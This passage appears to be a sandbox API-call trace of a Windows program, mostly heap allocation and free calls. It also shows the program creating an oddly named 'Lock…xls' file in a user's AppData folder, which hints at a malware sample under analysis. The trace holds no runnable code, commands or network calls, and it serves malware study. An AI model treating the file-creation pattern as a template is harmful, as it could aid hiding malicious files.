hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.854] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0150.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0150.855] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0150.855] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0150.855] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0150.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0150.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0150.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0150.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.856] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0150.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0150.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0150.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0150.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0150.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0150.856] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.sn-hlisepFoxRII.xls" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.sn-hlisepfoxrii.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0150.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0150.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0150.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0150.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0150.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0150.857] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0150.857] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0150.857] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0150.857] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0150.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0150.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0150.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0150.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0150.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0150.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0150.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0150.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0150.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0150.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0150.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0150.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0150.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0150.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0150.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0150.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cdb020 [0150.868] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0150.868] ReadFile (in: hFile=0x4b0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0xfbac, lpOverlapped=0x0) returned 1 [0150.870] ReadFile (in: hFile=0x4b0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0150.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0150.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0150.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0150.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfbac) returned 0x2aaf410 [0150.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cdb020 | out: hHeap=0x2af0000) returned 1 [0150.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0150.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0150.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0150.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0150.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0150.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0150.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfbac) returned 0x2abefc8 [0150.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0150.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0150.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0150.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0150.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0150.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0150.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfbac) returned 0x2aaf410 [0150.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0150.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0150.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0150.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0150.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0150.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0150.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0150.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0150.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0150.877] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0150.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0150.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfbac) returned 0x2aaf410 [0150.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0150.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0150.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0150.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0150.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72358 [0150.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0150.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0150.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0150.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa138 [0150.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0150.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0150.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0150.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0150.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0150.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfbac) returned 0x2aceb80 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0150.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0150.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0150.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0150.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0150.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0150.880] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0150.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0150.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0150.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0150.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0150.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0150.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0150.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0150.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0150.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0150.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0150.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0150.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0150.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0150.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0150.881] RtlAllocateHeap 